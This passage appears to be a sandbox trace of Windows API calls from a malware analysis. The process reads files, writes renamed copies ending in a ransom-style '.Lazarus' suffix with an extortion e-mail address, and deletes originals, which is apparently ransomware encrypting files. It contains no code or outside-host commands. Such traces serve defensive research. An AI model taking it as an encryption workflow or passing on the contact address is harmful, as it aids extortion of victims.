lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.545] GetLastError () returned 0x0 [0071.545] SetLastError (dwErrCode=0x0) [0071.545] GetLastError () returned 0x0 [0071.545] SetLastError (dwErrCode=0x0) [0071.545] GetLastError () returned 0x0 [0071.545] SetLastError (dwErrCode=0x0) [0071.545] GetLastError () returned 0x0 [0071.545] SetLastError (dwErrCode=0x0) [0071.545] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xc12, lpOverlapped=0x0) returned 1 [0071.545] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.546] GetLastError () returned 0x0 [0071.546] SetLastError (dwErrCode=0x0) [0071.546] GetLastError () returned 0x0 [0071.546] SetLastError (dwErrCode=0x0) [0071.546] GetLastError () returned 0x0 [0071.546] SetLastError (dwErrCode=0x0) [0071.546] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.546] GetLastError () returned 0x0 [0071.546] SetLastError (dwErrCode=0x0) [0071.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7d080 [0071.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0071.546] GetLastError () returned 0x0 [0071.546] SetLastError (dwErrCode=0x0) [0071.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0071.546] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xc20, lpOverlapped=0x0) returned 1 [0071.547] GetLastError () returned 0x0 [0071.547] SetLastError (dwErrCode=0x0) [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.547] GetLastError () returned 0x0 [0071.547] SetLastError (dwErrCode=0x0) [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0071.547] CloseHandle (hObject=0x418) returned 1 [0071.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.549] CloseHandle (hObject=0x410) returned 1 [0071.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.550] AreFileApisANSI () returned 1 [0071.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0071.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.550] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.551] GetFileType (hFile=0x410) returned 0x1 [0071.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0071.551] GetLastError () returned 0xb7 [0071.551] SetLastError (dwErrCode=0xb7) [0071.551] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.552] CloseHandle (hObject=0x410) returned 1 [0071.553] AreFileApisANSI () returned 1 [0071.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0071.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.553] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.554] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0071.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.555] AreFileApisANSI () returned 1 [0071.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.555] AreFileApisANSI () returned 1 [0071.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0071.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.675] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.675] GetFileType (hFile=0x410) returned 0x1 [0071.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.675] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.676] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.676] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.676] CloseHandle (hObject=0x410) returned 1 [0071.676] AreFileApisANSI () returned 1 [0071.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0071.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.676] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.676] GetFileType (hFile=0x410) returned 0x1 [0071.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.676] CloseHandle (hObject=0x410) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0071.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.677] AreFileApisANSI () returned 1 [0071.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0071.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.677] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.678] AreFileApisANSI () returned 1 [0071.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.678] GetLastError () returned 0x0 [0071.678] SetLastError (dwErrCode=0x0) [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0071.678] GetLastError () returned 0x0 [0071.678] SetLastError (dwErrCode=0x0) [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0071.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0071.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.679] AreFileApisANSI () returned 1 [0071.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a368, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0071.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x80a30 [0071.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a368, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0071.679] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.679] GetFileType (hFile=0x410) returned 0x1 [0071.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0071.679] AreFileApisANSI () returned 1 [0071.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0071.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.679] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.680] GetFileType (hFile=0x418) returned 0x1 [0071.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.680] GetLastError () returned 0x0 [0071.680] SetLastError (dwErrCode=0x0) [0071.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.680] GetLastError () returned 0x0 [0071.680] SetLastError (dwErrCode=0x0) [0071.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.680] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0071.682] 